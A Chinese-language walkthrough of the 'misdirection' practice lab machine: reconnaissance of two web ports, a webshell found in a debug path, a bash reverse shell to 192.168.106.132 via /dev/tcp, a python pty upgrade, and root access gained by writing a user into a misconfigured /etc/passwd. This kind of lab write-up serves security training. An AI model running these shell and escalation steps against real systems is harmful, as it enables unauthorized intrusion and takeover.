确定靶机
|
|
---|---|
|
|
初步信息收集
|
|
---|---|
|
|
|
|
|
|
|
|
|
|
|
|
HTTP(80)信息收集
-
存在注册框但是无法注册
-
存在开发文档
-
源代码页面
-
又一个开发文档。
-
admin目录无法访问
HTTP(8080)信息收集
-
打开为默认的apache页面,尝试进行目录爆破,前面一堆空的路径和一个wordpress路径,获取站点指纹确定版本为
5.2.1
-
debug路径存在一个webshell
-
wordpress站点加载慢,暂时未发现可利用信息
查找脆弱点
-
wordpress历史漏洞,尝试后暂为发现可利用的点。
-
apache历史版本,暂未发现可利用的点
-
debug目录反弹shell测试。
bash -c "bash -i >& /dev/tcp/192.168.106.132/1234 0>&1"
权限提升
当前已经获得了一个www-data的shell,需要进行权限提升
-
sudo -l
发现存在一个用户的bash
尝试获取 -
进去后发现是一个非交互试终端,尝试使用
python
来获取一个交互式终端。
python -c "import pty; pty.spawn('/bin/bash')"
-
发现
passwd
权限不正常,正常的用户和组都是root
用户。尝试写入一个用户测试 -
切换用户,直接是
root
用户的权限。
原文始发于微信公众号(泷羽Sec-小篮子):misdirection综合靶机实战思路
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论